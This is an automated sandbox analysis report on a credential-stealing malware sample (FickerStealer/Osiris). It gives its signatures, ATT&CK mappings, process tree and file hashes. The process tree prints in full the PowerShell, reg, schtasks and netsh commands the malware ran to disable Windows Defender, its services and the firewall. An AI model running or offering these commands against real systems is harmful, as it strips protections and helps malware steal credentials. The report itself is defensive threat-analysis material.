osiris | 90929f4e6bd28d6a197fef323930502ac1a3dcc9de8d4dba02dc6702fd570e14

Analysis

max time kernel
66s
max time network
52s
platform
windows7_x64
resource
win7v20201028
submitted
28-01-2021 10:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

FickerStealer.exe
Size

307KB
MD5

1c213dbc2e5f8646d4c30586b7bcb3d8
SHA1

7a7c24e9bde5666de8763232d9ffa012fe9d18cd
SHA256

90929f4e6bd28d6a197fef323930502ac1a3dcc9de8d4dba02dc6702fd570e14
SHA512

e4b5bf282c771e1ce7152fabd5a44ecd094d5a6b0a61c26d0e25f9df15b55a6efaeaeca6a4f52a84d8d5859b6d3d2e8f15280f619edbc7c5ac4321d2359067da

Score

10^/10

osiris banker botnet discovery evasion ransomware spyware trojan

Malware Config

Signatures

Contains code to disable Windows Defender 1 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\49BD.tmp\49BE.tmp\49BF.bat	disable_win_def

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Modifies security service 2 TTPs 1 IoCs
evasion

Modify Registry
T1112

Modify Existing Service
T1031

Processes:

reg.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe
Osiris
banker botnet osiris
Executes dropped EXE 4 IoCs

Processes:

1611834708978.exe1611834709056.exe1611834709056.exeGetX64BTIT.exe

pid process

1484 1611834708978.exe
908 1611834709056.exe
2024 1611834709056.exe
2040 GetX64BTIT.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Drops startup file 1 IoCs

Processes:

DllHost.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wsuj.exe DllHost.exe
Loads dropped DLL 5 IoCs

Processes:

FickerStealer.exe1611834709056.exe1611834709056.exe

pid process

2016 FickerStealer.exe
2016 FickerStealer.exe
2016 FickerStealer.exe
908 1611834709056.exe
2024 1611834709056.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"	reg.exe

pid	process
1484	1611834708978.exe
908	1611834709056.exe
2024	1611834709056.exe
2040	GetX64BTIT.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wsuj.exe	DllHost.exe

JavaScript code in executable 6 IoCs

Processes:

resource	yara_rule
\Users\Admin\AppData\Local\Temp\1611834709056.exe	js
C:\Users\Admin\AppData\Local\Temp\1611834709056.exe	js
\Users\Admin\AppData\Local\Temp\1611834709056.exe	js
C:\Users\Admin\AppData\Local\Temp\1611834709056.exe	js
\Users\Admin\AppData\Local\Temp\1611834709056.exe	js
C:\Users\Admin\AppData\Local\Temp\1611834709056.exe	js

Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

6 api.ipify.org
14 api.ipify.org
15 api.ipify.org
Uses Tor communications 1 TTPs
Malware can proxy its traffic through Tor for more anonymity.

Connection Proxy
T1090
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
ransomware

System Information Discovery
T1082
Suspicious use of SetThreadContext 1 IoCs

Processes:

FickerStealer.exe

description pid process target process

PID 1044 set thread context of 2016 1044 FickerStealer.exe FickerStealer.exe

flow	ioc
6	api.ipify.org
14	api.ipify.org
15	api.ipify.org

description	pid	process	target process
PID 1044 set thread context of 2016	1044	FickerStealer.exe	FickerStealer.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

FickerStealer.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	FickerStealer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	FickerStealer.exe

Suspicious behavior: EnumeratesProcesses 681 IoCs

Processes:

FickerStealer.exepowershell.exe1611834709056.exe1611834709056.exepowershell.exe

pid	process
2016	FickerStealer.exe
1672	powershell.exe
1672	powershell.exe
908	1611834709056.exe
908	1611834709056.exe
908	1611834709056.exe
908	1611834709056.exe
908	1611834709056.exe
908	1611834709056.exe
908	1611834709056.exe
908	1611834709056.exe
908	1611834709056.exe
908	1611834709056.exe
908	1611834709056.exe
908	1611834709056.exe
908	1611834709056.exe
908	1611834709056.exe
908	1611834709056.exe
908	1611834709056.exe
908	1611834709056.exe
908	1611834709056.exe
908	1611834709056.exe
908	1611834709056.exe
908	1611834709056.exe
2024	1611834709056.exe
2024	1611834709056.exe
2024	1611834709056.exe
2024	1611834709056.exe
2024	1611834709056.exe
2024	1611834709056.exe
2024	1611834709056.exe
2024	1611834709056.exe
2024	1611834709056.exe
2024	1611834709056.exe
2024	1611834709056.exe
2024	1611834709056.exe
2024	1611834709056.exe
2024	1611834709056.exe
2024	1611834709056.exe
2024	1611834709056.exe
1824	powershell.exe
2024	1611834709056.exe
2024	1611834709056.exe
2024	1611834709056.exe
2024	1611834709056.exe
2024	1611834709056.exe
2024	1611834709056.exe
2024	1611834709056.exe
1824	powershell.exe
2024	1611834709056.exe
2024	1611834709056.exe
2024	1611834709056.exe
2024	1611834709056.exe
2024	1611834709056.exe
2024	1611834709056.exe
2024	1611834709056.exe
2024	1611834709056.exe
2024	1611834709056.exe
2024	1611834709056.exe
2024	1611834709056.exe
2024	1611834709056.exe
2024	1611834709056.exe
2024	1611834709056.exe
2024	1611834709056.exe

Suspicious use of AdjustPrivilegeToken 19 IoCs

Processes:

1611834709056.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeSecurityPrivilege	908	1611834709056.exe
Token: SeDebugPrivilege	1672	powershell.exe
Token: SeDebugPrivilege	1824	powershell.exe
Token: SeDebugPrivilege	1964	powershell.exe
Token: SeDebugPrivilege	568	powershell.exe
Token: SeDebugPrivilege	588	powershell.exe
Token: SeDebugPrivilege	1540	powershell.exe
Token: SeDebugPrivilege	1148	powershell.exe
Token: SeDebugPrivilege	1780	powershell.exe
Token: SeDebugPrivilege	1992	powershell.exe
Token: SeDebugPrivilege	1880	powershell.exe
Token: SeDebugPrivilege	1608	powershell.exe
Token: SeDebugPrivilege	1476	powershell.exe
Token: SeDebugPrivilege	1248	powershell.exe
Token: SeDebugPrivilege	1340	powershell.exe
Token: SeDebugPrivilege	1824	powershell.exe
Token: SeDebugPrivilege	888	powershell.exe
Token: SeDebugPrivilege	1216	powershell.exe
Token: SeDebugPrivilege	2024	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

1611834709056.exe

pid process

2024 1611834709056.exe

pid	process
2024	1611834709056.exe

Suspicious use of WriteProcessMemory 199 IoCs

Processes:

FickerStealer.exeFickerStealer.exe1611834708978.execmd.exe1611834709056.exe1611834709056.exe

description	pid	process	target process
PID 1044 wrote to memory of 2016	1044	FickerStealer.exe	FickerStealer.exe
PID 1044 wrote to memory of 2016	1044	FickerStealer.exe	FickerStealer.exe
PID 1044 wrote to memory of 2016	1044	FickerStealer.exe	FickerStealer.exe
PID 1044 wrote to memory of 2016	1044	FickerStealer.exe	FickerStealer.exe
PID 1044 wrote to memory of 2016	1044	FickerStealer.exe	FickerStealer.exe
PID 1044 wrote to memory of 2016	1044	FickerStealer.exe	FickerStealer.exe
PID 1044 wrote to memory of 2016	1044	FickerStealer.exe	FickerStealer.exe
PID 1044 wrote to memory of 2016	1044	FickerStealer.exe	FickerStealer.exe
PID 1044 wrote to memory of 2016	1044	FickerStealer.exe	FickerStealer.exe
PID 1044 wrote to memory of 2016	1044	FickerStealer.exe	FickerStealer.exe
PID 1044 wrote to memory of 2016	1044	FickerStealer.exe	FickerStealer.exe
PID 1044 wrote to memory of 2016	1044	FickerStealer.exe	FickerStealer.exe
PID 1044 wrote to memory of 2016	1044	FickerStealer.exe	FickerStealer.exe
PID 1044 wrote to memory of 2016	1044	FickerStealer.exe	FickerStealer.exe
PID 2016 wrote to memory of 1484	2016	FickerStealer.exe	1611834708978.exe
PID 2016 wrote to memory of 1484	2016	FickerStealer.exe	1611834708978.exe
PID 2016 wrote to memory of 1484	2016	FickerStealer.exe	1611834708978.exe
PID 2016 wrote to memory of 1484	2016	FickerStealer.exe	1611834708978.exe
PID 2016 wrote to memory of 908	2016	FickerStealer.exe	1611834709056.exe
PID 2016 wrote to memory of 908	2016	FickerStealer.exe	1611834709056.exe
PID 2016 wrote to memory of 908	2016	FickerStealer.exe	1611834709056.exe
PID 2016 wrote to memory of 908	2016	FickerStealer.exe	1611834709056.exe
PID 1484 wrote to memory of 616	1484	1611834708978.exe	cmd.exe
PID 1484 wrote to memory of 616	1484	1611834708978.exe	cmd.exe
PID 1484 wrote to memory of 616	1484	1611834708978.exe	cmd.exe
PID 1484 wrote to memory of 616	1484	1611834708978.exe	cmd.exe
PID 616 wrote to memory of 552	616	cmd.exe	MpCmdRun.exe
PID 616 wrote to memory of 552	616	cmd.exe	MpCmdRun.exe
PID 616 wrote to memory of 552	616	cmd.exe	MpCmdRun.exe
PID 616 wrote to memory of 1672	616	cmd.exe	powershell.exe
PID 616 wrote to memory of 1672	616	cmd.exe	powershell.exe
PID 616 wrote to memory of 1672	616	cmd.exe	powershell.exe
PID 908 wrote to memory of 2024	908	1611834709056.exe	1611834709056.exe
PID 908 wrote to memory of 2024	908	1611834709056.exe	1611834709056.exe
PID 908 wrote to memory of 2024	908	1611834709056.exe	1611834709056.exe
PID 908 wrote to memory of 2024	908	1611834709056.exe	1611834709056.exe
PID 908 wrote to memory of 2024	908	1611834709056.exe	1611834709056.exe
PID 908 wrote to memory of 2024	908	1611834709056.exe	1611834709056.exe
PID 908 wrote to memory of 2024	908	1611834709056.exe	1611834709056.exe
PID 908 wrote to memory of 2024	908	1611834709056.exe	1611834709056.exe
PID 908 wrote to memory of 2024	908	1611834709056.exe	1611834709056.exe
PID 908 wrote to memory of 2024	908	1611834709056.exe	1611834709056.exe
PID 908 wrote to memory of 2024	908	1611834709056.exe	1611834709056.exe
PID 908 wrote to memory of 2024	908	1611834709056.exe	1611834709056.exe
PID 908 wrote to memory of 2024	908	1611834709056.exe	1611834709056.exe
PID 2024 wrote to memory of 2040	2024	1611834709056.exe	GetX64BTIT.exe
PID 2024 wrote to memory of 2040	2024	1611834709056.exe	GetX64BTIT.exe
PID 2024 wrote to memory of 2040	2024	1611834709056.exe	GetX64BTIT.exe
PID 2024 wrote to memory of 2040	2024	1611834709056.exe	GetX64BTIT.exe
PID 616 wrote to memory of 1824	616	cmd.exe	powershell.exe
PID 616 wrote to memory of 1824	616	cmd.exe	powershell.exe
PID 616 wrote to memory of 1824	616	cmd.exe	powershell.exe
PID 616 wrote to memory of 1964	616	cmd.exe	powershell.exe
PID 616 wrote to memory of 1964	616	cmd.exe	powershell.exe
PID 616 wrote to memory of 1964	616	cmd.exe	powershell.exe
PID 616 wrote to memory of 568	616	cmd.exe	powershell.exe
PID 616 wrote to memory of 568	616	cmd.exe	powershell.exe
PID 616 wrote to memory of 568	616	cmd.exe	powershell.exe
PID 616 wrote to memory of 588	616	cmd.exe	powershell.exe
PID 616 wrote to memory of 588	616	cmd.exe	powershell.exe
PID 616 wrote to memory of 588	616	cmd.exe	powershell.exe
PID 616 wrote to memory of 1540	616	cmd.exe	powershell.exe
PID 616 wrote to memory of 1540	616	cmd.exe	powershell.exe
PID 616 wrote to memory of 1540	616	cmd.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\FickerStealer.exe
"C:\Users\Admin\AppData\Local\Temp\FickerStealer.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1044

C:\Users\Admin\AppData\Local\Temp\FickerStealer.exe
"C:\Users\Admin\AppData\Local\Temp\FickerStealer.exe"
2⤵
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2016

C:\Users\Admin\AppData\Local\Temp\1611834708978.exe
"C:\Users\Admin\AppData\Local\Temp\1611834708978.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1484

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\49BD.tmp\49BE.tmp\49BF.bat C:\Users\Admin\AppData\Local\Temp\1611834708978.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:616

C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All Set-MpPreference -DisableIOAVProtection $true
5⤵
PID:552

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1672

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1824

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableBlockAtFirstSeen $true"
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1964

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableIOAVProtection $true"
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:568

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:588

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1540

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1148

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1780

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableScriptScanning $true"
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1992

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1880

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -MAPSReporting 0"
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1608

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1476

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1248

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1340

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1824

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:888

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 1 /f
6⤵
PID:1724

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "REG ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1216

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f
6⤵
PID:1240

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "netsh advfirewall set allprofiles state off"
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2024

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
6⤵
PID:1656

C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
5⤵
PID:1340

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
5⤵
PID:672

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
5⤵
PID:108

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
5⤵
PID:1636

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
5⤵
PID:932

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
5⤵
PID:1120

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
5⤵
PID:344

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
5⤵
PID:1824

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
5⤵
PID:1376

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
5⤵
PID:820

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
5⤵
PID:668

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
5⤵
PID:1072

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
5⤵
PID:976

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
5⤵
PID:788

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
5⤵
PID:552

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
5⤵
PID:888

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
5⤵
PID:368

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
5⤵
PID:748

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
5⤵
PID:1604

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
5⤵
PID:1976

C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
5⤵
PID:2040

C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
5⤵
PID:2044

C:\Windows\system32\reg.exe
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
5⤵
PID:1292

C:\Windows\system32\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
5⤵
PID:1828

C:\Windows\system32\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
5⤵
PID:1704

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
5⤵
PID:2016

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
5⤵
PID:1944

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
5⤵
PID:1696

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
5⤵
PID:736

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
5⤵
- Modifies security service
PID:2036

C:\Users\Admin\AppData\Local\Temp\1611834709056.exe
"C:\Users\Admin\AppData\Local\Temp\1611834709056.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:908

C:\Users\Admin\AppData\Local\Temp\1611834709056.exe
"C:\Users\Admin\AppData\Local\Temp\1611834709056.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2024

C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe
"C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe"
5⤵
- Executes dropped EXE
PID:2040

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{3AD05575-8857-4850-9277-11B85BDB8E09}
1⤵
- Drops startup file
PID:1384

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Connection Proxy

T1090

Disabling Security Tools

T1089

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Connection Proxy

T1090

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3d373cec-bf72-49d9-a5bc-ac438d27a74f

MD5
e5b3ba61c3cf07deda462c9b27eb4166

SHA1
b324dad73048be6e27467315f82b7a5c1438a1f9

SHA256
b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925

SHA512
a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3e48dddf-4be9-404a-8382-f00ce9fa2701

MD5
7f79b990cb5ed648f9e583fe35527aa7

SHA1
71b177b48c8bd745ef02c2affad79ca222da7c33

SHA256
080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683

SHA512
20926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_67fed384-9742-42bd-ab48-0dab5caef93b

MD5
d89968acfbd0cd60b51df04860d99896

SHA1
b3c29916ccb81ce98f95bbf3aa8a73de16298b29

SHA256
1020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9

SHA512
b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7c0d5e51-802d-4619-9520-75f40ede6115

MD5
a70ee38af4bb2b5ed3eeb7cbd1a12fa3

SHA1
81dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9

SHA256
dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d

SHA512
8c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_8a7ab1e4-4080-418b-8531-9b5c85c91200

MD5
2d5cd190b5db0620cd62e3cd6ba1dcd3

SHA1
ff4f229f4fbacccdf11d98c04ba756bda80aac7a

SHA256
ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d

SHA512
edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_bd37edfd-ee25-4ff2-aabe-5183884f66b1

MD5
faa37917b36371249ac9fcf93317bf97

SHA1
a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4

SHA256
b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132

SHA512
614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_cda1b658-b784-4cfa-8068-23e0209d9883

MD5
6f0d509e28be1af95ba237d4f43adab4

SHA1
c665febe79e435843553bee86a6cea731ce6c5e4

SHA256
f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e

SHA512
8dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

MD5
17e62f51abf300be64442e8b3eb154d2

SHA1
1304c56fc2290b390ac985a2fccda2f3568c0096

SHA256
7c9e9ec28891fe09144ea647f3dff138bd58ba42599a8207ec29fdc7859d841d

SHA512
55f77bf80b6f282bc2da30e1f77ca637b1af05c9b80ed0e8f1b619a090e985eccddd82b9307ab0452cedfb472423597ccb9f10646b2878a460fd68abfafc3674

Download Submit
C:\Users\Admin\AppData\Local\Temp\1611834708978.exe

MD5
c4384a44c4f624cfb9b52fbf8116b786

SHA1
10b43504bef3b004ade71f99784b3bde4e324e8d

SHA256
ef98f9fd8e48c339bbb625437f4a19966c58c47f0e79e99ac320027debb9c9c3

SHA512
05fb9b58bdf76635d0d2e4d05e6ca76ad7423a91b87d0bf825471c3afe0d714e863f86090db8fb1734a571841c96eb13449bfef4c04bdba1efecb3e3db15eb32

Download Submit
C:\Users\Admin\AppData\Local\Temp\1611834709056.exe

MD5
8e8f7ff797c292231959e4dd410a98da

SHA1
5fba19ae9f76b445d96dbca71f53113492b09d49

SHA256
ace9f321c9967b2ffe3bef9056c113b20040fe8831351082e186125aeea8ab0b

SHA512
c1e510a6d5f57eaad3b744e20145c07241b1e857e1a1832a0878cd6beedf115a40c8bfd655896d800579110687d208a59416044fdbd2811102aac334720a3c27

Download Submit
C:\Users\Admin\AppData\Local\Temp\1611834709056.exe

MD5
8e8f7ff797c292231959e4dd410a98da

SHA1
